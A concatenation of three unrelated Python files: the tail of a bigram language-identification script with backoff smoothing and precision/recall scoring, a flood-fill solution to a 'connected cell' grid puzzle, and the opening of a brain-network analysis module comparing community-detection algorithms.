tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang5')
countDevLang5+=1
#print("Done with %d sentences in dev set for Lang 5\n"%(countDevLang5))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev5.close()
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev6):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang6')
countDevLang6+=1
#print("Done with %d sentences in dev set for Lang 6\n"%(countDevLang6))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev6.close()
#for debugging
#countRight = 0
#countWrong = 0
##for debugging
#for i in range(1,len(predictedLang)):
# if(predictedLang[i] == actualLang[i]):
# countRight+=1
# else:
# countWrong+=1
#
#print("count right is: ",countRight)
#print("count wrong is: ",countWrong)
#print("legnth of the two sets is")
#print(len(predictedLang))
#print(len(actualLang))
#print("\n")
print("Now calculating precision recall and f1 scores\n")
#calculate precision and recall using scikit python module
precision = precision_score(actualLang, predictedLang,average = "macro")
recall = recall_score(actualLang, predictedLang,average = "macro")
print(
"\nTotal number of sentences in dev set 1 is %d, in dev set 2 is %d"
", in dev set 3 is %d, in dev set 4 is %d, in dev set 5 is %d, and in dev set 6 is %d."
%(countDevLang1,countDevLang2,countDevLang3,countDevLang4,countDevLang5,countDevLang6)
)
print("\nPrecision is:")
print(precision)
print("Recall is:")
print(recall)
f1Score = (2*precision*recall)/(precision+recall)
print("F1Score is:")
print(f1Score)
#check if correct number of arguments
if (len(sys.argv) <13 ) :
print("Incorrect number of arguments for the script")
else:
if len(sys.argv) >= 15:
bigramLaplace(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5],sys.argv[6], sys.argv[7],
sys.argv[8] , sys.argv[9], sys.argv[10], sys.argv[11], sys.argv[12], sys.argv[13],sys.argv[14])
elif len(sys.argv) == 15:
bigramLaplace(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5],sys.argv[6], sys.argv[7],
sys.argv[8] , sys.argv[9], sys.argv[10], sys.argv[11], sys.argv[12], sys.argv[13])
else :
bigramLaplace(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5],sys.argv[6], sys.argv[7],
sys.argv[8] , sys.argv[9], sys.argv[10], sys.argv[11], sys.argv[12]) |
import sys
def visit(matrix, marked, i, j, marked_by, count):
#print('visiting '+str((i, j))+' count:'+str(count))
if marked[i][j][0] is True:
return count
else:
marked[i][j] = (True, marked_by)
count += 1
for x in [i-1, i, i+1]:
for y in [j-1, j, j+1]:
if 0 <= x < len(matrix) and 0 <= y < len(matrix[0]) and not (x == i and y == j):
if matrix[x][y] == 1:
count = visit(matrix, marked, x, y, marked_by, count)
return count
def connectedCell(matrix):
# Complete this function
marked = []
for i in range(0, len(matrix)):
marked.append([])
for j in range(0, len(matrix[0])):
marked[i].append([False, None]) # [True, (x, y)] indicates marked by (x, y)
all_counts = []
for i in range(0, len(matrix)):
for j in range(0, len(matrix[0])):
if matrix[i][j] == 1:
all_counts.append(visit(matrix, marked, i, j, (i, j), 0))
return max(all_counts)
if __name__ == "__main__":
n = int(input().strip())
m = int(input().strip())
matrix = []
for matrix_i in range(n):
matrix_t = [int(matrix_temp) for matrix_temp in input().strip().split(' ')]
matrix.append(matrix_t)
result = connectedCell(matrix)
print(result) |
#!/home/despoB/mb3152/anaconda2/bin/python
import brain_graphs
import pandas as pd
import matlab
import matlab.engine
import os
import sys
import time
import numpy as np
import subprocess
import pickle
import h5py
import random
import time
import scipy
from scipy.io import loadmat
import scipy.io as sio
from scipy.stats.stats import pearsonr
import nibabel as nib
from sklearn.metrics.cluster import normalized_mutual_info_score
from sklearn.neural_network import MLPRegressor
from itertools import combinations, permutations
from igraph import Graph, ADJ_UNDIRECTED, VertexClustering
import glob
import math
import matplotlib.patches as patches
from collections import Counter
import matplotlib.pylab as plt
import matplotlib as mpl
from matplotlib import patches
plt.rcParams['pdf.fonttype'] = 42
path = '/home/despoB/mb3152/anaconda2/lib/python2.7/site-packages/matplotlib/mpl-data/fonts/ttf/Helvetica.ttf'
prop = mpl.font_manager.FontProperties(fname=path)
mpl.rcParams['font.family'] = prop.get_name()
import seaborn as sns
import powerlaw
from richclub import preserve_strength, RC
from multiprocessing import Pool
sys.path.append('/home/despoB/mb3152/dynamic_mod/')
from sklearn import linear_model, metrics
import random
global hcp_subjects
hcp_subjects = os.listdir('/home/despoB/connectome-data/')
hcp_subjects.sort()
# global pc_vals
# global fit_matrices
# global task_perf
import statsmodels.api as sm
from statsmodels.stats.mediation import Mediation
from scipy import stats, linalg
global homedir
# homedir = '/Users/Maxwell/HWNI/'
homedir = '/home/despoB/mb3152/'
import multiprocessing
from sklearn.decomposition import PCA,FastICA,FactorAnalysis
from sklearn.cross_decomposition import CCA
import copy
from quantities import millimeter
def mm_2_inches(mm):
mm = mm * millimeter
mm.units = 'inches'
return mm.item()
def alg_compare_multi(matrix):
alg1mods = []
alg2mods = []
alg3mods = []
for cost in np.array(range(5,16))*0.01:
temp_matrix = matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True,mst=True)
assert np.diff([cost,graph.density()])[0] < .01
alg1mods.append(graph.community_infomap(edge_weights='weight').modularity)
alg2mods.append(graph.community_multilevel(weights='weight').modularity)
alg3mods.append(graph.community_fastgreedy(weights='weight').as_clustering().modularity)
alg1mods = np.nanmean(alg1mods)
alg2mods = np.nanmean(alg2mods)
alg3mods = np.nanmean(alg3mods)
return [alg1mods,alg2mods,alg3mods]
def alg_compare(subjects,homedir=homedir):
task = 'REST'
atlas = 'power'
project='hcp'
matrices = []
for subject in subjects:
s_matrix = []
files = glob.glob('%sdynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(homedir,atlas,subject,atlas,task))
for f in files:
f = np.load(f)
np.fill_diagonal(f,0.0)
f[np.isnan(f)] = 0.0
f = np.arctanh(f)
s_matrix.append(f.copy())
if len(s_matrix) == 0:
continue
s_matrix = np.nanmean(s_matrix,axis=0)
matrices.append(s_matrix.copy())
pool = Pool(40)
results = pool.map(alg_compare_multi,matrices)
np.save('%sdynamic_mod/results/alg_compare.npy'%(homedir),results)
def alg_plot():
sns.set_style("white")
sns.set_style("ticks")
d = np.load('%sdynamic_mod/results/alg_compare.npy'%(homedir))
df = pd.DataFrame(columns=['Q','Community Algorithm'])
for i,s in enumerate(d):
df = df.append({"Q":s[0],'Community Algorithm':'InfoMap','subject':i},ignore_index=True)
df = df.append({"Q":s[1],'Community Algorithm':'Louvain','subject':i},ignore_index=True)
df = df.append({"Q":s[2],'Community Algorithm':'Fast Greedy','subject':i},ignore_index=True)
ax1 = plt.subplot2grid((3,3), (0,0), colspan=3)
ax2 = plt.subplot2grid((3,3), (1, 0))
ax3 = plt.subplot2grid((3,3), (1, 1))
ax4 = plt.subplot2grid((3,3), (1, 2))
sns.set_style("white")
sns.set_style("ticks")
sns.set(context="paper",font='Helvetica',font_scale=1.2)
sns.violinplot(data=df,inner='quartile',y='Q',x='Community Algorithm',palette=sns.color_palette("cubehelix", 8)[-3:],ax=ax1)
sns.plt.legend(bbox_to_anchor=[1,1.05],columnspacing=10)
ax1.set_title('Q Values Across Different Algorithms')
axes = [ax1,ax2,ax3]
for x,ax in zip(combinations(np.unique(df['Community Algorithm']),2),[ax2,ax3,ax4]):
print x[0],x[1]
print pearsonr(df.Q[df['Community Algorithm']==x[0]],df.Q[df['Community Algorithm']==x[1]])
print scipy.stats.ttest_ind(df.Q[df['Community Algorithm']==x[0]],df.Q[df['Community Algorithm']==x[1]])
sns.regplot(df.Q[df['Community Algorithm']==x[0]],df.Q[df['Community Algorithm']==x[1]],ax=ax,color=sns.dark_palette("muted purple", input="xkcd")[-1])
ax.set_xlabel(x[0] + ' Q')
ax.set_ylabel(x[1] + ' Q')
sns.plt.show()
plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/alg_compare.pdf',dpi=3600)
plt.close()
def nan_pearsonr(x,y):
x = np.array(x)
y = np.array(y)
isnan = np.sum([x,y],axis=0)
isnan = np.isnan(isnan) == False
return pearsonr(x[isnan],y[isnan])
def remove_missing_subjects(subjects,task,atlas):
"""
remove missing subjects, original array is being edited
"""
subjects = list(subjects)
for subject in subjects:
files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(atlas,subject,atlas,task))
if len(files) < 2:
subjects.remove(subject)
return subjects
def check_motion(subjects):
for subject in subjects:
e = np.load('/home/despoB/mb3152/dynamic_mod/component_activation/%s_12_False_engagement.npy' %(subject))
m = np.loadtxt('/home/despoB/mb3152/data/nki_data/preprocessed/pipeline_comp_cor_and_standard/%s_session_1/frame_wise_displacement/_scan_RfMRI_mx_645_rest/FD.1D'%(subject))
print pearsonr(m,np.std(e.reshape(900,12),axis=1))
